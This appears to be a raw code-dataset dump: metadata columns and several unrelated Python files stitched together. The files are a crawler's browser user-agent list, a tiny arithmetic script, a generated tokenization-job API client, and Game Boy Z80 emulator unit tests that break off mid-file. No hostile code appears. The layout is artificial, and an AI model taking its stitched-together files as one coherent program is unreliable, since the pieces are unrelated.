| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
20b22b5d846defee46da9ab47b10995bd1904751
| 756
|
py
|
Python
|
lncrawl/assets/user_agents.py
|
mesmerlord/lncrawler
|
b309e892969ecd3e7c8e68aef70b6614131fcb3c
|
[
"Apache-2.0"
] | 710
|
2018-11-16T13:33:30.000Z
|
2022-03-29T02:25:36.000Z
|
lncrawl/assets/user_agents.py
|
mesmerlord/lncrawler
|
b309e892969ecd3e7c8e68aef70b6614131fcb3c
|
[
"Apache-2.0"
] | 949
|
2018-11-11T16:16:09.000Z
|
2022-03-31T09:56:04.000Z
|
lncrawl/assets/user_agents.py
|
mesmerlord/lncrawler
|
b309e892969ecd3e7c8e68aef70b6614131fcb3c
|
[
"Apache-2.0"
] | 196
|
2018-11-15T17:41:36.000Z
|
2022-03-31T23:13:15.000Z
|
# -*- coding: utf-8 -*-
user_agents = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 Edg/94.0.992.38",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.3",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0",
]
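# NOTE (editor sketch): this list is typically consumed by picking one agent per
# request; random.choice here is illustrative and not part of the original module.
if __name__ == "__main__":
    import random
    print({"User-Agent": random.choice(user_agents)})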
| 68.727273
| 137
| 0.681217
| 142
| 756
| 3.619718
| 0.28169
| 0.087549
| 0.105058
| 0.18677
| 0.822957
| 0.822957
| 0.822957
| 0.822957
| 0.822957
| 0.822957
| 0
| 0.265337
| 0.137566
| 756
| 10
| 138
| 75.6
| 0.523006
| 0.027778
| 0
| 0
| 0
| 0.75
| 0.907231
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
20cf27ee921ebe0037fcd8169e92e1b0099befe1
| 79
|
py
|
Python
|
src/python/baekjoon/test.py
|
Hyeon9mak/Baekjoon
|
1595eeb260eaf41cc191bd4bbda5a9a2a817f1bd
|
[
"MIT"
] | null | null | null |
src/python/baekjoon/test.py
|
Hyeon9mak/Baekjoon
|
1595eeb260eaf41cc191bd4bbda5a9a2a817f1bd
|
[
"MIT"
] | null | null | null |
src/python/baekjoon/test.py
|
Hyeon9mak/Baekjoon
|
1595eeb260eaf41cc191bd4bbda5a9a2a817f1bd
|
[
"MIT"
] | null | null | null |
M = 26
N = (M%10*10) + (M//10 + M%10)
print(N)
print((1%10*10) + (1//10+1%10))
| 15.8
| 31
| 0.468354
| 20
| 79
| 1.85
| 0.3
| 0.243243
| 0.27027
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.323077
| 0.177215
| 79
| 5
| 31
| 15.8
| 0.246154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
459583d31c8fc655bcb42803cd5cf3a5f8af2ab0
| 21,165
|
py
|
Python
|
dxm/lib/masking_api/api/tokenization_job_api.py
|
experiortec/dxm-toolkit
|
b2ab6189e163c62fa8d7251cd533d2a36430d44a
|
[
"Apache-2.0"
] | 5
|
2018-08-23T15:47:05.000Z
|
2022-01-19T23:38:18.000Z
|
dxm/lib/masking_api/api/tokenization_job_api.py
|
experiortec/dxm-toolkit
|
b2ab6189e163c62fa8d7251cd533d2a36430d44a
|
[
"Apache-2.0"
] | 59
|
2018-10-15T10:37:00.000Z
|
2022-03-22T20:49:25.000Z
|
dxm/lib/masking_api/api/tokenization_job_api.py
|
experiortec/dxm-toolkit
|
b2ab6189e163c62fa8d7251cd533d2a36430d44a
|
[
"Apache-2.0"
] | 12
|
2019-03-08T19:59:13.000Z
|
2021-12-16T03:28:04.000Z
|
# coding: utf-8
"""
Masking API
Schema for the Masking Engine API # noqa: E501
OpenAPI spec version: 5.1.8
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from dxm.lib.masking_api.api_client import ApiClient
class TokenizationJobApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_tokenization_job(self, body, **kwargs): # noqa: E501
"""Create tokenization job # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_tokenization_job(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param TokenizationJob body: The tokenization job to create (required)
:return: TokenizationJob
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_tokenization_job_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.create_tokenization_job_with_http_info(body, **kwargs) # noqa: E501
return data
def create_tokenization_job_with_http_info(self, body, **kwargs): # noqa: E501
"""Create tokenization job # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_tokenization_job_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param TokenizationJob body: The tokenization job to create (required)
:return: TokenizationJob
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_tokenization_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `create_tokenization_job`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/tokenization-jobs', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TokenizationJob', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_tokenization_job(self, tokenization_job_id, **kwargs): # noqa: E501
"""Delete tokenization job by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_tokenization_job(tokenization_job_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int tokenization_job_id: The ID of the tokenization job to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_tokenization_job_with_http_info(tokenization_job_id, **kwargs) # noqa: E501
else:
(data) = self.delete_tokenization_job_with_http_info(tokenization_job_id, **kwargs) # noqa: E501
return data
def delete_tokenization_job_with_http_info(self, tokenization_job_id, **kwargs): # noqa: E501
"""Delete tokenization job by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_tokenization_job_with_http_info(tokenization_job_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int tokenization_job_id: The ID of the tokenization job to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['tokenization_job_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_tokenization_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'tokenization_job_id' is set
if self.api_client.client_side_validation and ('tokenization_job_id' not in params or
params['tokenization_job_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `tokenization_job_id` when calling `delete_tokenization_job`") # noqa: E501
collection_formats = {}
path_params = {}
if 'tokenization_job_id' in params:
path_params['tokenizationJobId'] = params['tokenization_job_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/tokenization-jobs/{tokenizationJobId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_tokenization_jobs(self, **kwargs): # noqa: E501
"""Get all tokenization jobs # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_tokenization_jobs(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_number: The page number for which to get tokenization jobs. This will default to the first page if excluded
:param int page_size: The maximum number of objects to return. This will default to the DEFAULT_API_PAGE_SIZE property if not provided
:param int environment_id: The ID of the environment to get all tokenization jobs from
:return: TokenizationJobList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_tokenization_jobs_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_all_tokenization_jobs_with_http_info(**kwargs) # noqa: E501
return data
def get_all_tokenization_jobs_with_http_info(self, **kwargs): # noqa: E501
"""Get all tokenization jobs # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_tokenization_jobs_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_number: The page number for which to get tokenization jobs. This will default to the first page if excluded
:param int page_size: The maximum number of objects to return. This will default to the DEFAULT_API_PAGE_SIZE property if not provided
:param int environment_id: The ID of the environment to get all tokenization jobs from
:return: TokenizationJobList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page_number', 'page_size', 'environment_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_tokenization_jobs" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'page_number' in params:
query_params.append(('page_number', params['page_number'])) # noqa: E501
if 'page_size' in params:
query_params.append(('page_size', params['page_size'])) # noqa: E501
if 'environment_id' in params:
query_params.append(('environment_id', params['environment_id'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/tokenization-jobs', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TokenizationJobList', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_tokenization_job_by_id(self, tokenization_job_id, **kwargs): # noqa: E501
"""Get tokenization job by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tokenization_job_by_id(tokenization_job_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int tokenization_job_id: The ID of the tokenization job to get (required)
:return: TokenizationJob
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_tokenization_job_by_id_with_http_info(tokenization_job_id, **kwargs) # noqa: E501
else:
(data) = self.get_tokenization_job_by_id_with_http_info(tokenization_job_id, **kwargs) # noqa: E501
return data
def get_tokenization_job_by_id_with_http_info(self, tokenization_job_id, **kwargs): # noqa: E501
"""Get tokenization job by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tokenization_job_by_id_with_http_info(tokenization_job_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int tokenization_job_id: The ID of the tokenization job to get (required)
:return: TokenizationJob
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['tokenization_job_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_tokenization_job_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'tokenization_job_id' is set
if self.api_client.client_side_validation and ('tokenization_job_id' not in params or
params['tokenization_job_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `tokenization_job_id` when calling `get_tokenization_job_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'tokenization_job_id' in params:
path_params['tokenizationJobId'] = params['tokenization_job_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/tokenization-jobs/{tokenizationJobId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TokenizationJob', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_tokenization_job(self, tokenization_job_id, body, **kwargs): # noqa: E501
"""Update tokenization job by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_tokenization_job(tokenization_job_id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int tokenization_job_id: The ID of the tokenization job to update (required)
:param TokenizationJob body: The updated tokenization job (required)
:return: TokenizationJob
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_tokenization_job_with_http_info(tokenization_job_id, body, **kwargs) # noqa: E501
else:
(data) = self.update_tokenization_job_with_http_info(tokenization_job_id, body, **kwargs) # noqa: E501
return data
def update_tokenization_job_with_http_info(self, tokenization_job_id, body, **kwargs): # noqa: E501
"""Update tokenization job by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_tokenization_job_with_http_info(tokenization_job_id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int tokenization_job_id: The ID of the tokenization job to update (required)
:param TokenizationJob body: The updated tokenization job (required)
:return: TokenizationJob
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['tokenization_job_id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_tokenization_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'tokenization_job_id' is set
if self.api_client.client_side_validation and ('tokenization_job_id' not in params or
params['tokenization_job_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `tokenization_job_id` when calling `update_tokenization_job`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `update_tokenization_job`") # noqa: E501
collection_formats = {}
path_params = {}
if 'tokenization_job_id' in params:
path_params['tokenizationJobId'] = params['tokenization_job_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/tokenization-jobs/{tokenizationJobId}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TokenizationJob', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
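# NOTE (editor sketch): illustrative call pattern for this generated client;
# the ApiClient must be configured with engine host and api_key credentials
# elsewhere, so nothing below targets a real engine.
if __name__ == '__main__':
    api = TokenizationJobApi(api_client=ApiClient())
    jobs = api.get_all_tokenization_jobs(page_size=10)  # first page of jobs
    print(jobs)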
| 41.337891
| 142
| 0.625514
| 2,457
| 21,165
| 5.111111
| 0.06919
| 0.114668
| 0.060917
| 0.028667
| 0.944099
| 0.938605
| 0.923475
| 0.90086
| 0.895127
| 0.891782
| 0
| 0.014012
| 0.291897
| 21,165
| 511
| 143
| 41.418787
| 0.823914
| 0.330262
| 0
| 0.781818
| 1
| 0
| 0.192653
| 0.057423
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04
| false
| 0
| 0.014545
| 0
| 0.112727
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
45d6008341fea03df718ef9fcc625ed1ec1dd8df
| 86,745
|
py
|
Python
|
tests/test_z80.py
|
zmarvel/slowboy
|
c173343746b425f97d15ad0f25637f345b867fcd
|
[
"MIT"
] | 2
|
2017-01-27T03:38:18.000Z
|
2022-02-18T12:07:26.000Z
|
tests/test_z80.py
|
zmarvel/slowboy
|
c173343746b425f97d15ad0f25637f345b867fcd
|
[
"MIT"
] | 4
|
2017-04-24T02:58:30.000Z
|
2017-04-24T03:13:10.000Z
|
tests/test_z80.py
|
zmarvel/slowboy
|
c173343746b425f97d15ad0f25637f345b867fcd
|
[
"MIT"
] | null | null | null |
import unittest
import slowboy.z80
class TestZ80(unittest.TestCase):
def setUp(self):
self.cpu = slowboy.z80.Z80()
def test_init(self):
self.assertEqual(self.cpu.pc, 0x100)
self.assertEqual(self.cpu.sp, 0xfffe)
self.assertEqual(self.cpu.registers['a'], 0x01)
self.assertEqual(self.cpu.registers['f'], 0xb0)
self.assertEqual(self.cpu.registers['b'], 0x00)
self.assertEqual(self.cpu.registers['c'], 0x13)
self.assertEqual(self.cpu.registers['d'], 0x00)
self.assertEqual(self.cpu.registers['e'], 0xd8)
self.assertEqual(self.cpu.registers['h'], 0x01)
self.assertEqual(self.cpu.registers['l'], 0x4d)
self.assertEqual(self.cpu.state, slowboy.z80.State.STOP)
def test_set_reg8(self):
self.cpu.set_reg8('B', 0)
self.cpu.set_reg8('C', 1)
self.cpu.set_reg8('D', 2)
self.cpu.set_reg8('E', 3)
self.cpu.set_reg8('H', 4)
self.cpu.set_reg8('L', 5)
self.cpu.set_reg8('A', 6)
registers = self.cpu.get_registers()
self.assertEqual(registers['b'], 0)
self.assertEqual(registers['c'], 1)
self.assertEqual(registers['d'], 2)
self.assertEqual(registers['e'], 3)
self.assertEqual(registers['h'], 4)
self.assertEqual(registers['l'], 5)
self.assertEqual(registers['a'], 6)
def test_set_reg8_invalid_argument(self):
with self.assertRaises(KeyError) as cm:
self.cpu.set_reg8('BC', 0xbc)
with self.assertRaises(KeyError) as cm:
self.cpu.set_reg8('de', 0xde)
with self.assertRaises(KeyError) as cm:
self.cpu.set_reg8('HL', 0xbc)
with self.assertRaises(KeyError) as cm:
self.cpu.set_reg8('sp', 0xde)
with self.assertRaises(KeyError) as cm:
self.cpu.set_reg8('PC', 0xff)
def test_get_reg8(self):
self.cpu.set_reg8('B', 0)
self.cpu.set_reg8('C', 1)
self.cpu.set_reg8('D', 2)
self.cpu.set_reg8('E', 3)
self.cpu.set_reg8('H', 4)
self.cpu.set_reg8('L', 5)
self.cpu.set_reg8('A', 6)
self.assertEqual(self.cpu.get_reg8('b'), 0)
self.assertEqual(self.cpu.get_reg8('c'), 1)
self.assertEqual(self.cpu.get_reg8('d'), 2)
self.assertEqual(self.cpu.get_reg8('e'), 3)
self.assertEqual(self.cpu.get_reg8('h'), 4)
self.assertEqual(self.cpu.get_reg8('l'), 5)
self.assertEqual(self.cpu.get_reg8('a'), 6)
def test_get_reg8_invalid_argument(self):
with self.assertRaises(KeyError) as cm:
self.cpu.get_reg8('BC')
with self.assertRaises(KeyError) as cm:
self.cpu.get_reg8('de')
with self.assertRaises(KeyError) as cm:
self.cpu.get_reg8('HL')
with self.assertRaises(KeyError) as cm:
self.cpu.get_reg8('sp')
with self.assertRaises(KeyError) as cm:
self.cpu.get_reg8('PC')
with self.assertRaises(KeyError) as cm:
self.cpu.get_reg8('x')
def test_set_reg16(self):
self.cpu.set_reg16('BC', 0x1234)
self.cpu.set_reg16('DE', 0x3456)
self.cpu.set_reg16('HL', 0x5678)
self.assertEqual(self.cpu.get_reg8('f'), 0xb0)
self.cpu.set_reg16('af', 0xabcd)
self.assertEqual(self.cpu.get_reg8('B'), 0x12)
self.assertEqual(self.cpu.get_reg8('C'), 0x34)
self.assertEqual(self.cpu.get_reg8('D'), 0x34)
self.assertEqual(self.cpu.get_reg8('E'), 0x56)
self.assertEqual(self.cpu.get_reg8('H'), 0x56)
self.assertEqual(self.cpu.get_reg8('L'), 0x78)
self.assertEqual(self.cpu.get_reg8('a'), 0xab)
# f is not writable, so should remain unchanged
self.assertEqual(self.cpu.get_reg8('f'), 0xb0)
def test_get_reg16(self):
self.cpu.set_reg16('BC', 0x1234)
self.cpu.set_reg16('DE', 0x3456)
self.cpu.set_reg16('HL', 0x5678)
self.cpu.sp = 0x7fff
self.assertEqual(self.cpu.get_reg16('BC'), 0x1234)
self.assertEqual(self.cpu.get_reg16('DE'), 0x3456)
self.assertEqual(self.cpu.get_reg16('HL'), 0x5678)
self.assertEqual(self.cpu.get_reg16('sp'), 0x7fff)
def test_set_sp(self):
self.cpu.sp = 0x51234
self.assertEqual(self.cpu.sp, 0x1234)
def test_get_sp(self):
self.cpu.sp = 0x1234
self.assertEqual(self.cpu.sp, self.cpu.sp)
def test_inc_sp(self):
self.cpu.sp = 0x1234
self.cpu.inc_sp()
self.assertEqual(self.cpu.sp, 0x1235)
def test_set_pc(self):
self.cpu.pc = 0x1000
self.assertEqual(self.cpu.pc, 0x1000)
def test_get_pc(self):
self.cpu.pc = 0x11000
self.assertEqual(self.cpu.get_pc(), 0x1000)
def test_inc_pc(self):
self.cpu.pc = 0xffff
self.cpu.inc_pc()
self.assertEqual(self.cpu.get_pc(), 0x0000)
def test_nop(self):
regA = self.cpu.get_reg8('A')
regB = self.cpu.get_reg8('B')
regC = self.cpu.get_reg8('C')
regD = self.cpu.get_reg8('D')
regE = self.cpu.get_reg8('E')
regH = self.cpu.get_reg8('H')
regL = self.cpu.get_reg8('L')
self.cpu.nop()
self.cpu.nop()
self.assertEqual(self.cpu.get_reg8('A'), regA)
self.assertEqual(self.cpu.get_reg8('B'), regB)
self.assertEqual(self.cpu.get_reg8('C'), regC)
self.assertEqual(self.cpu.get_reg8('D'), regD)
self.assertEqual(self.cpu.get_reg8('E'), regE)
self.assertEqual(self.cpu.get_reg8('H'), regH)
self.assertEqual(self.cpu.get_reg8('L'), regL)
class TestZ80LoadStore(unittest.TestCase):
def setUp(self):
self.cpu = slowboy.z80.Z80()
self.cpu.pc = 0
def test_ld_imm8toreg8(self):
self.cpu.mmu.rom = bytes([0, 1, 2, 3, 4, 5, 6])
self.cpu.ld_imm8toreg8('B')()
self.cpu.ld_imm8toreg8('C')()
self.cpu.ld_imm8toreg8('D')()
self.cpu.ld_imm8toreg8('E')()
self.cpu.ld_imm8toreg8('H')()
self.cpu.ld_imm8toreg8('L')()
self.cpu.ld_imm8toreg8('A')()
self.assertEqual(self.cpu.get_reg8('B'), 0)
self.assertEqual(self.cpu.get_reg8('C'), 1)
self.assertEqual(self.cpu.get_reg8('D'), 2)
self.assertEqual(self.cpu.get_reg8('E'), 3)
self.assertEqual(self.cpu.get_reg8('H'), 4)
self.assertEqual(self.cpu.get_reg8('L'), 5)
self.assertEqual(self.cpu.get_reg8('A'), 6)
def test_ld_imm8toreg8_invalid_register(self):
self.cpu.mmu.rom = bytes([0, 1, 2, 3, 4, 5, 6])
with self.assertRaises(KeyError) as cm:
self.cpu.ld_imm8toreg8('BC')()
def test_ld_reg8toreg8(self):
self.cpu.set_reg8('B', 0x00)
self.cpu.set_reg8('C', 0x11)
self.cpu.set_reg8('D', 0x22)
self.cpu.set_reg8('E', 0x33)
self.cpu.set_reg8('H', 0x44)
self.cpu.set_reg8('L', 0x55)
self.cpu.set_reg8('A', 0x66)
self.cpu.ld_reg8toreg8('B', 'B')()
self.assertEqual(self.cpu.get_reg8('B'), 0x00)
self.cpu.ld_reg8toreg8('C', 'B')()
self.assertEqual(self.cpu.get_reg8('B'), 0x11)
self.cpu.ld_reg8toreg8('D', 'B')()
self.assertEqual(self.cpu.get_reg8('B'), 0x22)
self.cpu.ld_reg8toreg8('E', 'B')()
self.assertEqual(self.cpu.get_reg8('B'), 0x33)
self.cpu.ld_reg8toreg8('H', 'B')()
self.assertEqual(self.cpu.get_reg8('B'), 0x44)
self.cpu.ld_reg8toreg8('L', 'B')()
self.assertEqual(self.cpu.get_reg8('B'), 0x55)
self.cpu.ld_reg8toreg8('A', 'B')()
self.assertEqual(self.cpu.get_reg8('B'), 0x66)
def test_ld_reg8toreg8_invalid_register(self):
with self.assertRaises(KeyError) as cm:
self.cpu.ld_reg8toreg8('C', 'BC')()
with self.assertRaises(KeyError) as cm:
self.cpu.ld_reg8toreg8('BC', 'C')()
def test_ld_reg8toreg16addr(self):
for x in range(256):
self.cpu.set_reg8('a', x)
self.cpu.set_reg16('bc', 0xc000 + x)
self.cpu.ld_reg8toreg16addr('a', 'bc')()
self.assertEqual(self.cpu.mmu.get_addr(0xc000 + x), x)
self.assertEqual(self.cpu.get_reg16('bc'), 0xc000 + x)
def test_ld_reg8toreg16addr_inc(self):
self.cpu.set_reg8('b', 0xfd)
self.cpu.set_reg16('de', 0xcfff)
self.cpu.ld_reg8toreg16addr_inc('b', 'de')()
self.assertEqual(self.cpu.mmu.get_addr(0xcfff), 0xfd)
self.assertEqual(self.cpu.get_reg8('b'), 0xfd)
self.assertEqual(self.cpu.get_reg16('de'), 0xd000)
def test_ld_reg8toreg16addr_dec(self):
self.cpu.set_reg8('b', 0xfd)
self.cpu.set_reg16('de', 0xcfff)
self.cpu.ld_reg8toreg16addr_dec('b', 'de')()
self.assertEqual(self.cpu.mmu.get_addr(0xcfff), 0xfd)
self.assertEqual(self.cpu.get_reg8('b'), 0xfd)
self.assertEqual(self.cpu.get_reg16('de'), 0xcffe)
def test_ld_reg8toreg16addr_2(self):
self.cpu.set_reg16('bc', 0xc000)
for x in range(256):
self.cpu.set_reg8('a', x)
self.cpu.ld_reg8toreg16addr_inc('a', 'bc')()
self.assertEqual(self.cpu.mmu.get_addr(0xc000 + x), x)
def test_ld_reg8toreg16addr_3(self):
self.cpu.set_reg16('bc', 0xc0ff)
for x in range(256):
self.cpu.set_reg8('a', x)
self.cpu.ld_reg8toreg16addr_dec('a', 'bc')()
self.assertEqual(self.cpu.mmu.get_addr(0xc0ff - x), x)
def test_ld_reg8toimm16addr(self):
self.cpu.set_reg8('a', 0xab)
self.cpu.mmu.rom = bytes([0x00, 0xc0])
self.cpu.ld_reg8toimm16addr('a')()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0xab)
